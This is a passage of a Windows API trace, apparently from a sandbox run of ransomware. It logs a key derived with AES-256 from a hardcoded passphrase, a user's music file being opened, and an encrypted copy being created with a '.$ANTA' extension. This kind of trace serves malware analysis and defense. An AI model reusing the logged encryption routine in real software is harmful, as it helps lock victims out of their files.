out: hHeap=0x1780000) returned 1 [0112.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0112.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0112.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0112.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0112.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0112.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0112.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0112.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0112.847] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0112.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca3d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0112.848] CloseHandle (hObject=0x298) returned 1 [0112.848] FreeLibrary (hLibModule=0x772d0000) returned 1 [0112.848] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0112.848] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\P0gI1wm_F5y2n.m4a", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7737e170, ftCreationTime.dwHighDateTime=0x1d5e128, ftLastAccessTime.dwLowDateTime=0x808b4980, ftLastAccessTime.dwHighDateTime=0x1d5efc7, ftLastWriteTime.dwLowDateTime=0x808b4980, ftLastWriteTime.dwHighDateTime=0x1d5efc7, nFileSizeHigh=0x0, nFileSizeLow=0x12464, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="P0gI1wm_F5y2n.m4a", cAlternateFileName="P0GI1W~1.M4A")) returned 0x41ac500 [0112.848] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0112.848] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0112.848] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0112.848] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0112.848] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0112.848] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0112.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0112.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0112.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0112.849] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0112.849] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0112.849] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0112.849] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0112.849] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0112.849] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0112.849] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0113.000] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.000] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0113.000] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0113.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca880, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0113.000] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0113.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0113.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0113.000] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0113.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0113.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0113.000] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.001] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0113.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca9d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0113.001] CryptHashData (hHash=0x41ac540, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0113.001] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.001] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0113.001] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0113.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa48, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0113.001] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac540, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac000) returned 1 [0113.001] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.001] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0113.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796ea8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0113.001] CryptDestroyHash (hHash=0x41ac540) returned 1 [0113.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0113.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e97a0 [0113.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0113.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0113.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0113.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0113.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0113.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0113.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0113.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0113.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0113.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0113.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0113.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0113.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0113.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0113.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0113.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0113.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0113.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0113.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8f00 [0113.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0113.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0113.002] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0113.002] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0113.002] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0113.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0113.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0113.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0113.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0113.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0113.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0113.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0113.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0113.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0113.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eaa90 [0113.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0113.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0113.003] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\P0gI1wm_F5y2n.m4a" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\p0gi1wm_f5y2n.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0113.003] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.003] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0113.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0113.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0113.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0113.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0113.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0113.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0113.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0113.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0113.004] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0113.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0113.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0113.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0113.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0113.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0113.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0113.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0113.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0113.004] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0113.004] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0113.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0113.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0113.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0113.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0113.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0113.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0113.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0113.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0113.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0113.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0113.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0113.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0113.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0113.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0113.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0113.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0113.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0113.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0113.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0113.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0113.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0113.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0113.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0113.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0113.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0113.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918c0 [0113.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0113.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a40c8 [0113.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0113.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a450 [0113.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0113.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0113.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a40c8 | out: hHeap=0x1780000) returned 1 [0113.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0113.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0113.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0113.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918c0 | out: hHeap=0x1780000) returned 1 [0113.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0113.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a450 | out: hHeap=0x1780000) returned 1 [0113.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0113.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0113.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0113.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0113.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0113.006] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u")) returned 0x10 [0113.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0113.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0113.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0113.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0113.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0113.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0113.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0113.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0113.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0113.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0113.006] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\P0gI1wm_F5y2n.m4a.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\p0gi1wm_f5y2n.m4a.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0113.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0113.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0113.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0113.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0113.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0113.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0113.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0113.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0113.007] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0113.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0113.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0113.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0113.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0113.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0113.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0113.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 